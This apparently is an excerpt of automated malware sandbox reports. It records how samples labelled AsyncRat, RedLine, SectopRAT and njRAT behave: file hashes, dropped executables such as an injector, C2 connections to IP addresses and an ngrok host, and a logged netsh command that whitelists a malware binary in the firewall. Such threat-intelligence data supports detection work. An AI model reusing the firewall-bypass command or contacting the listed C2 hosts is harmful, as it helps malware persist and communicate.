| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
memory/1152-28-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/1152-42-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2524-54-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-65-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-69-0x0000000000400000-0x0000000000D41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
memory/2524-80-0x0000000000400000-0x0000000000D41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
memory/2524-100-0x0000000000400000-0x0000000000D41000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2524-106-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-107-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-108-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-109-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-110-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-111-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-112-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2524-113-0x0000000000400000-0x0000000000D41000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20240903-en
Max time kernel
125s
Max time network
136s
Command Line
Signatures
AsyncRat
Asyncrat family
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d68b4d6cec032458824abdf3ac6f379f33db2167cb0c399845f4d7735a426827.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\d68b4d6cec032458824abdf3ac6f379f33db2167cb0c399845f4d7735a426827.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\d68b4d6cec032458824abdf3ac6f379f33db2167cb0c399845f4d7735a426827.exe
"C:\Users\Admin\AppData\Local\Temp\d68b4d6cec032458824abdf3ac6f379f33db2167cb0c399845f4d7735a426827.exe"
Network
| Country | Destination | Domain | Proto |
| BG | 95.169.210.148:6666 | tcp | |
| BG | 95.169.210.148:6666 | tcp | |
| BG | 95.169.210.148:6666 | tcp | |
| BG | 95.169.210.148:6666 | tcp | |
| BG | 95.169.210.148:6666 | tcp | |
| BG | 95.169.210.148:6666 | tcp |
Files
memory/2116-0-0x000007FEF55B3000-0x000007FEF55B4000-memory.dmp
memory/2116-1-0x0000000000970000-0x0000000000982000-memory.dmp
memory/2116-2-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp
memory/2116-3-0x000007FEF55B3000-0x000007FEF55B4000-memory.dmp
memory/2116-4-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
153s
Command Line
Signatures
AsyncRat
Asyncrat family
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d68b4d6cec032458824abdf3ac6f379f33db2167cb0c399845f4d7735a426827.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\d68b4d6cec032458824abdf3ac6f379f33db2167cb0c399845f4d7735a426827.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\d68b4d6cec032458824abdf3ac6f379f33db2167cb0c399845f4d7735a426827.exe
"C:\Users\Admin\AppData\Local\Temp\d68b4d6cec032458824abdf3ac6f379f33db2167cb0c399845f4d7735a426827.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| BG | 95.169.210.148:6666 | tcp | |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| BG | 95.169.210.148:6666 | tcp | |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| BG | 95.169.210.148:6666 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| BG | 95.169.210.148:6666 | tcp | |
| BG | 95.169.210.148:6666 | tcp | |
| BG | 95.169.210.148:6666 | tcp | |
| BG | 95.169.210.148:6666 | tcp |
Files
memory/3932-0-0x00007FFBF2683000-0x00007FFBF2685000-memory.dmp
memory/3932-1-0x00000000004C0000-0x00000000004D2000-memory.dmp
memory/3932-2-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp
memory/3932-3-0x00007FFBF2683000-0x00007FFBF2685000-memory.dmp
memory/3932-4-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20241010-en
Max time kernel
146s
Max time network
149s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\output.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cpAaYCmhNDsLQiRFCCCqoVSn.exe | N/A |
Loads dropped DLL
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cpAaYCmhNDsLQiRFCCCqoVSn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\236020bb910e3cfd1e03bff5722204be40c0739fb6d2954b35c8b02185e37ef6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\output.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cpAaYCmhNDsLQiRFCCCqoVSn.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\236020bb910e3cfd1e03bff5722204be40c0739fb6d2954b35c8b02185e37ef6.exe
"C:\Users\Admin\AppData\Local\Temp\236020bb910e3cfd1e03bff5722204be40c0739fb6d2954b35c8b02185e37ef6.exe"
C:\Users\Admin\AppData\Roaming\output.exe
"C:\Users\Admin\AppData\Roaming\output.exe"
C:\Users\Admin\AppData\Local\Temp\cpAaYCmhNDsLQiRFCCCqoVSn.exe
"C:\Users\Admin\AppData\Local\Temp\cpAaYCmhNDsLQiRFCCCqoVSn.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp | |
| NL | 45.81.227.32:22625 | tcp |
Files
C:\Users\Admin\AppData\Roaming\output.exe
| MD5 | 2f376ad2903620fd9f52c4d8af903777 |
| SHA1 | 726ecc2dff7d3af1b4d03591761183f70c9a1242 |
| SHA256 | e60ab1c5095002e6ed227251cfc4c4124db13255af95b6b76405e44e7a750215 |
| SHA512 | 75fbb18d81c022bef30887718da799ffd77c462ef324b9975bd3815b7af5b759e70858a9e0f472b9bedd0af3c90a05df02fd3f6c492fea802e12c719ad2dd0eb |
memory/2796-17-0x0000000073C3E000-0x0000000073C3F000-memory.dmp
memory/2796-18-0x0000000000A10000-0x0000000000A58000-memory.dmp
memory/2796-19-0x0000000073C30000-0x000000007431E000-memory.dmp
\Users\Admin\AppData\Local\Temp\cpAaYCmhNDsLQiRFCCCqoVSn.exe
| MD5 | f4bbbbd0c06b5b5f46386ad1db6227b0 |
| SHA1 | 5a026b7ed8c49b1213a6393e938c91399ff33eb8 |
| SHA256 | 3783dda749b402ddb2065d6830dc3d7d2771b4b8dc02358efe64947205b2517d |
| SHA512 | 3a7554883cf3c729a1f249eff33e3ad5de69be174971209e536d7d2c829d50bc9666391e9663db782eb445f8e8f87c81ac7b0248faff2f2e594909bbd84f5d48 |
memory/2140-27-0x00000000013C0000-0x00000000013DE000-memory.dmp
memory/2796-28-0x0000000073C30000-0x000000007431E000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2212 set thread context of 1388 | N/A | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe
"C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe"
C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe
C:\Users\Admin\AppData\Local\Temp\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 185.203.243.131:27365 | tcp | |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| NL | 185.203.243.131:27365 | tcp | |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp | |
| NL | 185.203.243.131:27365 | tcp | |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
memory/2212-0-0x00000000745FE000-0x00000000745FF000-memory.dmp
memory/2212-1-0x00000000008C0000-0x0000000000920000-memory.dmp
memory/2212-2-0x0000000005290000-0x0000000005306000-memory.dmp
memory/2212-3-0x0000000005230000-0x000000000524E000-memory.dmp
memory/2212-4-0x00000000745F0000-0x0000000074DA0000-memory.dmp
memory/1388-5-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9c2554e79b717eca531348c6e0430944ab7288bc46a8d56e2e49898c4b0e59a0.exe.log
| MD5 | 3654bd2c6957761095206ffdf92b0cb9 |
| SHA1 | 6f10f7b5867877de7629afcff644c265e79b4ad3 |
| SHA256 | c2a4be94cf4ed33d698d9838f4ffb47047da796e733ec11562463a1621212ab4 |
| SHA512 | e2a81248cca7732ce098088d5237897493fd3629e28d66bc13e5f9191f72cd52893f4a53905906af12d5c6de475738b6c7f6b718a32869e9ee0deb3a54672f79 |
memory/2212-8-0x00000000745F0000-0x0000000074DA0000-memory.dmp
memory/1388-9-0x00000000745F0000-0x0000000074DA0000-memory.dmp
memory/1388-10-0x0000000005A60000-0x0000000006078000-memory.dmp
memory/1388-11-0x0000000005460000-0x0000000005472000-memory.dmp
memory/1388-12-0x00000000054C0000-0x00000000054FC000-memory.dmp
memory/1388-13-0x00000000745F0000-0x0000000074DA0000-memory.dmp
memory/1388-14-0x0000000005500000-0x000000000554C000-memory.dmp
memory/1388-15-0x0000000005770000-0x000000000587A000-memory.dmp
memory/1388-16-0x00000000745F0000-0x0000000074DA0000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20240903-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
Njrat family
njRAT/Bladabindi
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Checker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe | N/A |
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a568f22004828c8dc2e3e31c3a8f49a89b164e1eb268f57c93430b20368cfe3b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Checker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Checker.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a568f22004828c8dc2e3e31c3a8f49a89b164e1eb268f57c93430b20368cfe3b.exe
"C:\Users\Admin\AppData\Local\Temp\a568f22004828c8dc2e3e31c3a8f49a89b164e1eb268f57c93430b20368cfe3b.exe"
C:\Users\Admin\AppData\Local\Temp\Checker.exe
"C:\Users\Admin\AppData\Local\Temp\Checker.exe"
C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe
"C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c pause
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\SA_Checker.exe" "SA_Checker.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.128.107.74:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 52.14.18.129:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.22.53.161:17971 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.131.207.170:17971 | 2.tcp.ngrok.io | tcp |
| US | 3.131.207.170:17971 | 2.tcp.ngrok.io | tcp |
Files
\Users\Admin\AppData\Local\Temp\Checker.exe
| MD5 | 970dbe61f878ffef5c98df482a33b93a |
| SHA1 | 2f8e4f7dd06cc67da661f7a33e6a6f79182bc957 |
| SHA256 | bda3eaba6bd0015d68a261b9f8afd2431f702524b7a333fca3b3514058aaff48 |
| SHA512 | f1c9b203e1770e3327217998b4a002a3494e61b8883b2ad4cb6439d3105b65c8cf807d77c029331b678df15dfc89bdff52bd93124b78c67d6f342fc48e2c8621 |
\Users\Admin\AppData\Local\Temp\SA_Checker.exe
| MD5 | 88949354d6430e1c6fd4ee0e0d987070 |
| SHA1 | 10d1014f00cd173449f1d3ea2b698a5443688584 |
| SHA256 | d08373a237b6f58a7b1215926fac0faefcdddbf7967b4226f84cbdb275a261f0 |
| SHA512 | 8a18883b2f89bc87449d9fde1ef835fba2186c494ffa3b2adcded7b86103ddd0154856dd5fa9b2e565b6bedd50b80975a8a07ac56560bc725c84c5d7d90abe29 |
memory/2688-18-0x00000000745C1000-0x00000000745C2000-memory.dmp
memory/2688-19-0x00000000745C0000-0x0000000074B6B000-memory.dmp
memory/2688-20-0x00000000745C0000-0x0000000074B6B000-memory.dmp
memory/2688-22-0x00000000745C0000-0x0000000074B6B000-memory.dmp
memory/2688-23-0x00000000745C0000-0x0000000074B6B000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\svchost.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
